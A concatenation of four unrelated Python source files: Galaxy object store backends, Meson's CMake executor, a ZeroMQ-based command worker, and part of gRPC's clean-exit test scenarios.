super(DistributedObjectStore, self).shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
self.sleeper.sleep(120) # Test free space every 2 minutes
def create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self.exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid('objectstore.create, could not generate '
'obj.object_store_id: %s, kwargs: %s'
% (str(obj), str(kwargs)))
_create_object_in_session(obj)
log.debug("Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
else:
log.debug("Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning('The backend object store ID (%s) for %s object with ID %s is invalid'
% (obj.object_store_id, obj.__class__.__name__, obj.id))
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning('%s object with ID %s found in backend object store with ID %s'
% (obj.__class__.__name__, obj.id, id))
obj.object_store_id = id
_create_object_in_session(obj)
return id
return None
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects only the first store is used.
"""
store_type = 'hierarchical'
def __init__(self, config, config_dict, fsmon=False):
"""The default contructor. Extends `NestedObjectStore`."""
super(HierarchicalObjectStore, self).__init__(config, config_dict)
backends = odict()
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for b in sorted(config_xml.find('backends'), key=lambda b: int(b.get('order'))):
store_type = b.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super(HierarchicalObjectStore, self).to_dict()
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class = None
objectstore_constructor_kwds = {}
if store == 'disk':
objectstore_class = DiskObjectStore
elif store == 's3':
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == 'cloud':
from .cloud import Cloud
objectstore_class = Cloud
elif store == 'swift':
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == 'distributed':
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'hierarchical':
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'irods':
from .rods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == 'azure_blob':
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == 'pithos':
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
'hierarchical', 'irods', and 'pulsar' are supported values.
"""
from_object = 'xml'
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = ElementTree.parse(config.object_store_config_file).getroot()
store = config_xml.get('type')
else:
with open(config_file, "rt") as f:
config_dict = yaml.safe_load(f)
from_object = 'dict'
store = config_dict.get('type')
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get('type')
elif config_dict is not None:
from_object = 'dict'
store = config_dict.get('type')
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if objectstore_class is None:
log.error("Unrecognized object store definition: {0}".format(store))
if from_object == 'xml':
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get('base_dir', None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == 'DiskObjectStore':
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception("Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?"
% func.__name__)
return wraps
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = '%.2fTB' % terabytes
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
size = '%.2fGB' % gigabytes
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = '%.2fMB' % megabytes
elif bytes >= 1024:
kilobytes = bytes / 1024
size = '%.2fKB' % kilobytes
else:
size = '%.2fb' % bytes
return size
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses.
"""
return {
'object_store_check_old_style': config.object_store_check_old_style,
'file_path': config.file_path,
'umask': config.umask,
'jobs_directory': config.jobs_directory,
'new_file_path': config.new_file_path,
'object_store_cache_path': config.object_store_cache_path,
'gid': config.gid,
}
def _create_object_in_session(obj):
session = object_session(obj) if object_session is not None else None
if session is not None:
object_session(obj).add(obj)
object_session(obj).flush()
else:
raise Exception(NO_SESSION_ERROR_MESSAGE)
class ObjectStorePopulator(object):
""" Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, app):
self.object_store = app.object_store
self.object_store_id = None
def set_object_store_id(self, data):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
data.dataset.object_store_id = self.object_store_id
try:
self.object_store.create(data.dataset)
except ObjectInvalid:
raise Exception('Unable to create output dataset: object store is full')
self.object_store_id = data.dataset.object_store_id # these will be the same thing after the first output
|
executor.py
|
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
import subprocess as S
from pathlib import Path
from threading import Thread
import typing as T
import re
import os
import shutil
import ctypes
import textwrap
from .. import mlog, mesonlib
from ..mesonlib import PerMachine, Popen_safe, version_compare, MachineChoice
from ..environment import Environment
from ..envconfig import get_env_var
if T.TYPE_CHECKING:
from ..dependencies.base import ExternalProgram
TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]
MESON_TO_CMAKE_MAPPING = {
'arm': 'ARMCC',
'armclang': 'ARMClang',
'clang': 'Clang',
'clang-cl': 'MSVC',
'flang': 'Flang',
'g95': 'G95',
'gcc': 'GNU',
'intel': 'Intel',
'intel-cl': 'MSVC',
'msvc': 'MSVC',
'pathscale': 'PathScale',
'pgi': 'PGI',
'sun': 'SunPro',
}
def meson_compiler_to_cmake_id(cobj):
# cland and apple clang both map to 'clang' in meson, so we need to look at
# the linker that's being used
if cobj.linker.get_id() == 'ld64':
return 'AppleClang'
# If no mapping, try GNU and hope that the build files don't care
return MESON_TO_CMAKE_MAPPING.get(cobj.get_id(), 'GNU')
class CMakeExecutor:
# The class's copy of the CMake path. Avoids having to search for it
# multiple times in the same Meson invocation.
class_cmakebin = PerMachine(None, None)
class_cmakevers = PerMachine(None, None)
class_cmake_cache = {} # type: T.Dict[T.Any, TYPE_result]
def __init__(self, environment: Environment, version: str, for_machine: MachineChoice, silent: bool = False):
self.min_version = version
self.environment = environment
self.for_machine = for_machine
self.cmakebin, self.cmakevers = self.find_cmake_binary(self.environment, silent=silent)
self.always_capture_stderr = True
self.print_cmout = False
self.prefix_paths = [] # type: T.List[str]
self.extra_cmake_args = [] # type: T.List[str]
if self.cmakebin is False:
self.cmakebin = None
return
if not version_compare(self.cmakevers, self.min_version):
mlog.warning(
'The version of CMake', mlog.bold(self.cmakebin.get_path()),
'is', mlog.bold(self.cmakevers), 'but version', mlog.bold(self.min_version),
'is required')
self.cmakebin = None
return
self.prefix_paths = self.environment.coredata.builtins_per_machine[self.for_machine]['cmake_prefix_path'].value
env_pref_path = get_env_var(
self.for_machine,
self.environment.is_cross_build(),
'CMAKE_PREFIX_PATH')
if env_pref_path is not None:
if mesonlib.is_windows():
# Cannot split on ':' on Windows because its in the drive letter
env_pref_path = env_pref_path.split(os.pathsep)
else:
# https://github.com/mesonbuild/meson/issues/7294
env_pref_path = re.split(r':|;', env_pref_path)
env_pref_path = [x for x in env_pref_path if x] # Filter out empty strings
if not self.prefix_paths:
self.prefix_paths = []
self.prefix_paths += env_pref_path
if self.prefix_paths:
self.extra_cmake_args += ['-DCMAKE_PREFIX_PATH={}'.format(';'.join(self.prefix_paths))]
def find_cmake_binary(self, environment: Environment, silent: bool = False) -> T.Tuple['ExternalProgram', str]:
from ..dependencies.base import find_external_program
# Only search for CMake the first time and store the result in the class
# definition
if CMakeExecutor.class_cmakebin[self.for_machine] is False:
mlog.debug('CMake binary for %s is cached as not found' % self.for_machine)
elif CMakeExecutor.class_cmakebin[self.for_machine] is not None:
mlog.debug('CMake binary for %s is cached.' % self.for_machine)
else:
assert CMakeExecutor.class_cmakebin[self.for_machine] is None
mlog.debug('CMake binary for %s is not cached' % self.for_machine)
for potential_cmakebin in find_external_program(
environment, self.for_machine, 'cmake', 'CMake',
environment.default_cmake, allow_default_for_cross=False):
version_if_ok = self.check_cmake(potential_cmakebin)
if not version_if_ok:
continue
if not silent:
mlog.log('Found CMake:', mlog.bold(potential_cmakebin.get_path()),
'(%s)' % version_if_ok)
CMakeExecutor.class_cmakebin[self.for_machine] = potential_cmakebin
CMakeExecutor.class_cmakevers[self.for_machine] = version_if_ok
break
else:
if not silent:
mlog.log('Found CMake:', mlog.red('NO'))
# Set to False instead of None to signify that we've already
# searched for it and not found it
CMakeExecutor.class_cmakebin[self.for_machine] = False
CMakeExecutor.class_cmakevers[self.for_machine] = None
return CMakeExecutor.class_cmakebin[self.for_machine], CMakeExecutor.class_cmakevers[self.for_machine]
def check_cmake(self, cmakebin: 'ExternalProgram') -> T.Optional[str]:
if not cmakebin.found():
mlog.log('Did not find CMake {!r}'.format(cmakebin.name))
return None
try:
p, out = Popen_safe(cmakebin.get_command() + ['--version'])[0:2]
if p.returncode != 0:
mlog.warning('Found CMake {!r} but couldn\'t run it'
''.format(' '.join(cmakebin.get_command())))
return None
except FileNotFoundError:
mlog.warning('We thought we found CMake {!r} but now it\'s not there. How odd!'
''.format(' '.join(cmakebin.get_command())))
return None
except PermissionError:
msg = 'Found CMake {!r} but didn\'t have permissions to run it.'.format(' '.join(cmakebin.get_command()))
if not mesonlib.is_windows():
msg += '\n\nOn Unix-like systems this is often caused by scripts that are not executable.'
mlog.warning(msg)
return None
cmvers = re.search(r'(cmake|cmake3)\s*version\s*([\d.]+)', out).group(2)
return cmvers
def set_exec_mode(self, print_cmout: T.Optional[bool] = None, always_capture_stderr: T.Optional[bool] = None) -> None:
if print_cmout is not None:
self.print_cmout = print_cmout
if always_capture_stderr is not None:
self.always_capture_stderr = always_capture_stderr
def _cache_key(self, args: T.List[str], build_dir: str, env):
fenv = frozenset(env.items()) if env is not None else None
targs = tuple(args)
return (self.cmakebin, targs, build_dir, fenv)
def _call_cmout_stderr(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.PIPE, cwd=build_dir, env=env)
# stdout and stderr MUST be read at the same time to avoid pipe
# blocking issues. The easiest way to do this is with a separate
# thread for one of the pipes.
def print_stdout():
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
try:
# Read stderr line by line and log non trace lines
raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line = proc.stderr.readline()
if not line:
break
line = line.decode(errors='ignore')
if tline_start_reg.match(line):
raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
raw_trace += line
else:
mlog.warning(line.strip('\n'))
finally:
proc.stderr.close()
t.join()
proc.wait()
return proc.returncode, None, raw_trace
def _call_cmout(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.STDOUT, cwd=build_dir, env=env)
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
proc.wait()
return proc.returncode, None, None
def _call_quiet(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
os.makedirs(build_dir, exist_ok=True)
cmd = self.cmakebin.get_command() + args
ret = S.run(cmd, env=env, cwd=build_dir, close_fds=False,
stdout=S.PIPE, stderr=S.PIPE, universal_newlines=False)
rc = ret.returncode
out = ret.stdout.decode(errors='ignore')
err = ret.stderr.decode(errors='ignore')
call = ' '.join(cmd)
mlog.debug("Called `{}` in {} -> {}".format(call, build_dir, rc))
return rc, out, err
def _call_impl(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
if not self.print_cmout:
return self._call_quiet(args, build_dir, env)
else:
if self.always_capture_stderr:
return self._call_cmout_stderr(args, build_dir, env)
else:
return self._call_cmout(args, build_dir, env)
def call(self, args: T.List[str], build_dir: str, env=None, disable_cache: bool = False) -> TYPE_result:
if env is None:
env = os.environ
args = args + self.extra_cmake_args
if disable_cache:
return self._call_impl(args, build_dir, env)
# First check if cached, if not call the real cmake function
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key not in cache:
cache[key] = self._call_impl(args, build_dir, env)
return cache[key]
def call_with_fake_build(self, args: T.List[str], build_dir: str, env=None) -> TYPE_result:
# First check the cache
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key in cache:
return cache[key]
os.makedirs(build_dir, exist_ok=True)
# Try to set the correct compiler for C and C++
# This step is required to make try_compile work inside CMake
fallback = os.path.realpath(__file__) # A file used as a fallback wehen everything else fails
compilers = self.environment.coredata.compilers[MachineChoice.BUILD]
def make_abs(exe: str, lang: str) -> str:
if os.path.isabs(exe):
return exe
p = shutil.which(exe)
if p is None:
mlog.debug('Failed to find a {} compiler for CMake. This might cause CMake to fail.'.format(lang))
p = fallback
return p
def choose_compiler(lang: str) -> T.Tuple[str, str, str, str]:
comp_obj = None
exe_list = []
if lang in compilers:
comp_obj = compilers[lang]
else:
try:
comp_obj = self.environment.compiler_from_language(lang, MachineChoice.BUILD)
except Exception:
pass
if comp_obj is not None:
exe_list = comp_obj.get_exelist()
comp_id = meson_compiler_to_cmake_id(comp_obj)
comp_version = comp_obj.version.upper()
if len(exe_list) == 1:
return make_abs(exe_list[0], lang), '', comp_id, comp_version
elif len(exe_list) == 2:
return make_abs(exe_list[1], lang), make_abs(exe_list[0], lang), comp_id, comp_version
else:
mlog.debug('Failed to find a {} compiler for CMake. This might cause CMake to fail.'.format(lang))
return fallback, '', 'GNU', ''
c_comp, c_launcher, c_id, c_version = choose_compiler('c')
cxx_comp, cxx_launcher, cxx_id, cxx_version = choose_compiler('cpp')
fortran_comp, fortran_launcher, _, _ = choose_compiler('fortran')
# on Windows, choose_compiler returns path with \ as separator - replace by / before writing to CMAKE file
c_comp = c_comp.replace('\\', '/')
c_launcher = c_launcher.replace('\\', '/')
cxx_comp = cxx_comp.replace('\\', '/')
cxx_launcher = cxx_launcher.replace('\\', '/')
fortran_comp = fortran_comp.replace('\\', '/')
fortran_launcher = fortran_launcher.replace('\\', '/')
# Reset the CMake cache
(Path(build_dir) / 'CMakeCache.txt').write_text('CMAKE_PLATFORM_INFO_INITIALIZED:INTERNAL=1\n')
# Fake the compiler files
comp_dir = Path(build_dir) / 'CMakeFiles' / self.cmakevers
comp_dir.mkdir(parents=True, exist_ok=True)
c_comp_file = comp_dir / 'CMakeCCompiler.cmake'
cxx_comp_file = comp_dir / 'CMakeCXXCompiler.cmake'
fortran_comp_file = comp_dir / 'CMakeFortranCompiler.cmake'
if c_comp and not c_comp_file.is_file():
is_gnu = '1' if c_id == 'GNU' else ''
c_comp_file.write_text(textwrap.dedent('''\
# Fake CMake file to skip the boring and slow stuff
set(CMAKE_C_COMPILER "{}") # Should be a valid compiler for try_compile, etc.
set(CMAKE_C_COMPILER_LAUNCHER "{}") # The compiler launcher (if presentt)
set(CMAKE_COMPILER_IS_GNUCC {})
set(CMAKE_C_COMPILER_ID "{}")
set(CMAKE_C_COMPILER_VERSION "{}")
set(CMAKE_C_COMPILER_LOADED 1)
set(CMAKE_C_COMPILER_FORCED 1)
set(CMAKE_C_COMPILER_WORKS TRUE)
set(CMAKE_C_ABI_COMPILED TRUE)
set(CMAKE_C_SOURCE_FILE_EXTENSIONS c;m)
set(CMAKE_C_IGNORE_EXTENSIONS h;H;o;O;obj;OBJ;def;DEF;rc;RC)
set(CMAKE_SIZEOF_VOID_P "{}")
'''.format(c_comp, c_launcher, is_gnu, c_id, c_version,
ctypes.sizeof(ctypes.c_voidp))))
if cxx_comp and not cxx_comp_file.is_file():
is_gnu = '1' if cxx_id == 'GNU' else ''
cxx_comp_file.write_text(textwrap.dedent('''\
# Fake CMake file to skip the boring and slow stuff
set(CMAKE_CXX_COMPILER "{}") # Should be a valid compiler for try_compile, etc.
set(CMAKE_CXX_COMPILER_LAUNCHER "{}") # The compiler launcher (if presentt)
set(CMAKE_COMPILER_IS_GNUCXX {})
set(CMAKE_CXX_COMPILER_ID "{}")
set(CMAKE_CXX_COMPILER_VERSION "{}")
set(CMAKE_CXX_COMPILER_LOADED 1)
set(CMAKE_CXX_COMPILER_FORCED 1)
set(CMAKE_CXX_COMPILER_WORKS TRUE)
set(CMAKE_CXX_ABI_COMPILED TRUE)
set(CMAKE_CXX_IGNORE_EXTENSIONS inl;h;hpp;HPP;H;o;O;obj;OBJ;def;DEF;rc;RC)
set(CMAKE_CXX_SOURCE_FILE_EXTENSIONS C;M;c++;cc;cpp;cxx;mm;CPP)
set(CMAKE_SIZEOF_VOID_P "{}")
'''.format(cxx_comp, cxx_launcher, is_gnu, cxx_id, cxx_version,
ctypes.sizeof(ctypes.c_voidp))))
if fortran_comp and not fortran_comp_file.is_file():
fortran_comp_file.write_text(textwrap.dedent('''\
# Fake CMake file to skip the boring and slow stuff
set(CMAKE_Fortran_COMPILER "{}") # Should be a valid compiler for try_compile, etc.
set(CMAKE_Fortran_COMPILER_LAUNCHER "{}") # The compiler launcher (if presentt)
set(CMAKE_Fortran_COMPILER_ID "GNU") # Pretend we have found GCC
set(CMAKE_COMPILER_IS_GNUG77 1)
set(CMAKE_Fortran_COMPILER_LOADED 1)
set(CMAKE_Fortran_COMPILER_WORKS TRUE)
set(CMAKE_Fortran_ABI_COMPILED TRUE)
set(CMAKE_Fortran_IGNORE_EXTENSIONS h;H;o;O;obj;OBJ;def;DEF;rc;RC)
set(CMAKE_Fortran_SOURCE_FILE_EXTENSIONS f;F;fpp;FPP;f77;F77;f90;F90;for;For;FOR;f95;F95)
set(CMAKE_SIZEOF_VOID_P "{}")
'''.format(fortran_comp, fortran_launcher, ctypes.sizeof(ctypes.c_voidp))))
return self.call(args, build_dir, env)
def found(self) -> bool:
return self.cmakebin is not None
def version(self) -> str:
return self.cmakevers
def executable_path(self) -> str:
return self.cmakebin.get_path()
def get_command(self) -> T.List[str]:
return self.cmakebin.get_command()
def get_cmake_prefix_paths(self) -> T.List[str]:
return self.prefix_paths
def machine_choice(self) -> MachineChoice:
return self.for_machine
|
worker.py
|
import copy
import os
import subprocess
import time
from multiprocessing import Process
from setproctitle import setproctitle
import zmq
from hayabusa import HayabusaBase
from hayabusa.constants import Status
from hayabusa.errors import unexpected_error
from hayabusa.utils import time_str
class Worker(HayabusaBase):
def __init__(self):
super().__init__('worker')
self.name = 'MainProcess'
self.info('========================='
' Starting Worker '
'=========================')
setproctitle('hayabusa_worker')
self.hostname = os.uname()[1]
config = self.config
self.num_processes = int(config['worker']['process'])
self.request_borker_host = config['request-broker']['host']
self.local_command_port = config['port']['worker-local']
self.receiver_port = config['port']['command']
self.sender_port = config['port']['result']
self.bash_path = config['path']['bash']
receiver_connect = 'tcp://%s:%s' % \
(self.request_borker_host, self.receiver_port)
sender_bind = 'tcp://%s:%s' % ('127.0.0.1', self.local_command_port)
self.info('Command PULL: %s', receiver_connect)
self.info('Command Local PUSH: %s', sender_bind)
pull_context = zmq.Context()
self.main_receiver = pull_context.socket(zmq.PULL)
self.main_receiver.connect(receiver_connect)
push_context = zmq.Context()
self.main_sender = push_context.socket(zmq.PUSH)
self.main_sender.bind(sender_bind)
def worker_label(self):
return '%s-%s' % (self.hostname, self.name)
def __log(self, logger, format, *args):
logger('[%s] - %s', self.name, (format % args))
def info(self, *args):
self.__log(self.logger.info, *args)
def debug(self, *args):
self.__log(self.logger.debug, *args)
def connect_ports(self):
receiver_connect = 'tcp://%s:%s' % \
('127.0.0.1', self.local_command_port)
sender_connect = 'tcp://%s:%s' % \
(self.request_borker_host, self.sender_port)
self.info('Command Local PULL: %s', receiver_connect)
self.info('Result PUSH: %s', sender_connect)
pull_context = zmq.Context()
self.receiver = pull_context.socket(zmq.PULL)
self.receiver.connect(receiver_connect)
push_context = zmq.Context()
self.sender = push_context.socket(zmq.PUSH)
self.sender.connect(sender_connect)
def start(self):
self.info('Starting %s Worker Processes: %s', self.num_processes,
self.hostname)
for i in range(self.num_processes):
p = Process(target=self.main_loop, args=(i+1,))
p.start()
# Load balancing
while True:
message = self.main_receiver.recv()
self.main_sender.send(message)
def notify(self, message):
new_message = copy.deepcopy(message)
new_message['type'] = 'notice'
new_message['worker'] = self.worker_label()
new_message['message'] = Status.RW_ReceivedCommand.name
self.sender.send_json(new_message)
self.debug('[%s] - %s',
Status.WR_SentNotice, new_message)
def send_result(self, start_time, message, process):
stdout = process.stdout
stderr = process.stderr
exit_status = process.returncode
new_message = copy.deepcopy(message)
new_message['type'] = 'result'
new_message['worker'] = self.worker_label()
new_message['stderr'] = stderr
new_message['exit_status'] = exit_status
new_message['stdout'] = stdout
elapsed_time = float('%.3f' % (time.time() - start_time))
new_message['elapsed_time'] = elapsed_time
self.sender.send_json(new_message)
log_message = self.log_filter(new_message)
self.debug('[%s] [%s]: %s', Status.WR_SentResult,
time_str(time.time() - start_time), log_message)
def main_loop(self, index):
self.name = 'Process-%s' % index
self.info('Starting Process: %s', self.name)
message = {}
try:
self.connect_ports()
while True:
# Wait for next command from Request Broker
message = self.receiver.recv_json()
self.main(message)
except Exception as e:
unexpected_error(self.logger, 'Worker-%s' % self.name, e, message)
raise
def main(self, message):
start_time = time.time()
self.debug('[%s] - %s', Status.RW_ReceivedCommand, message)
self.notify(message)
cmd = message['command']
# Bash is required for 'Brace Expansion'.
process = subprocess.run(cmd, executable=self.bash_path, shell=True,
encoding='utf-8', stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.send_result(start_time, message, process)
|
_exit_scenarios.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a number of module-scope gRPC scenarios to test clean exit."""
import argparse
import logging
import threading
import time
import grpc
from tests.unit.framework.common import test_constants
WAIT_TIME = 1000
REQUEST = b'request'
UNSTARTED_SERVER = 'unstarted_server'
RUNNING_SERVER = 'running_server'
POLL_CONNECTIVITY_NO_SERVER = 'poll_connectivity_no_server'
POLL_CONNECTIVITY = 'poll_connectivity'
IN_FLIGHT_UNARY_UNARY_CALL = 'in_flight_unary_unary_call'
IN_FLIGHT_UNARY_STREAM_CALL = 'in_flight_unary_stream_call'
IN_FLIGHT_STREAM_UNARY_CALL = 'in_flight_stream_unary_call'
IN_FLIGHT_STREAM_STREAM_CALL = 'in_flight_stream_stream_call'
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL = 'in_flight_partial_unary_stream_call'
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL = 'in_flight_partial_stream_unary_call'
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL = 'in_flight_partial_stream_stream_call'
UNARY_UNARY = b'/test/UnaryUnary'
UNARY_STREAM = b'/test/UnaryStream'
STREAM_UNARY = b'/test/StreamUnary'
STREAM_STREAM = b'/test/StreamStream'
PARTIAL_UNARY_STREAM = b'/test/PartialUnaryStream'
PARTIAL_STREAM_UNARY = b'/test/PartialStreamUnary'
PARTIAL_STREAM_STREAM = b'/test/PartialStreamStream'
TEST_TO_METHOD = {
IN_FLIGHT_UNARY_UNARY_CALL: UNARY_UNARY,
IN_FLIGHT_UNARY_STREAM_CALL: UNARY_STREAM,
IN_FLIGHT_STREAM_UNARY_CALL: STREAM_UNARY,
IN_FLIGHT_STREAM_STREAM_CALL: STREAM_STREAM,
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL: PARTIAL_UNARY_STREAM,
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL: PARTIAL_STREAM_UNARY,
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL: PARTIAL_STREAM_STREAM,
}
def hang_unary_unary(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_unary_stream(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield request
time.sleep(WAIT_TIME)
def hang_stream_unary(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_unary(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
next(request_iterator)
time.sleep(WAIT_TIME)
def hang_stream_stream(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_stream(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield next(request_iterator) #pylint: disable=stop-iteration-return
time.sleep(WAIT_TIME)
class MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming, partial_hang):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
if partial_hang:
self.stream_stream = hang_partial_stream_stream
else:
self.stream_stream = hang_stream_stream
elif self.request_streaming:
if partial_hang:
self.stream_unary = hang_partial_stream_unary
else:
self.stream_unary = hang_stream_unary
elif self.response_streaming:
if partial_hang:
self.unary_stream = hang_partial_unary_stream
else:
self.unary_stream = hang_unary_stream
else:
self.unary_unary = hang_unary_unary
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == UNARY_UNARY:
return MethodHandler(False, False, False)
elif handler_call_details.method == UNARY_STREAM:
return MethodHandler(False, True, False)
elif handler_call_details.method == STREAM_UNARY:
return MethodHandler(True, False, False)
elif handler_call_details.method == STREAM_STREAM:
return MethodHandler(True, True, False)
elif handler_call_details.method == PARTIAL_UNARY_STREAM:
return MethodHandler(False, True, True)
elif handler_call_details.method == PARTIAL_STREAM_UNARY:
return MethodHandler(True, False, True)
elif handler_call_details.method == PARTIAL_STREAM_STREAM:
return MethodHandler(True, True, True)
else:
return None
# Traditional executors will not exit until all their
# current jobs complete. Because we submit jobs that will
# never finish, we don't want to block exit on these jobs.
class DaemonPool(object):
def submit(self, fn, *args, **kwargs):
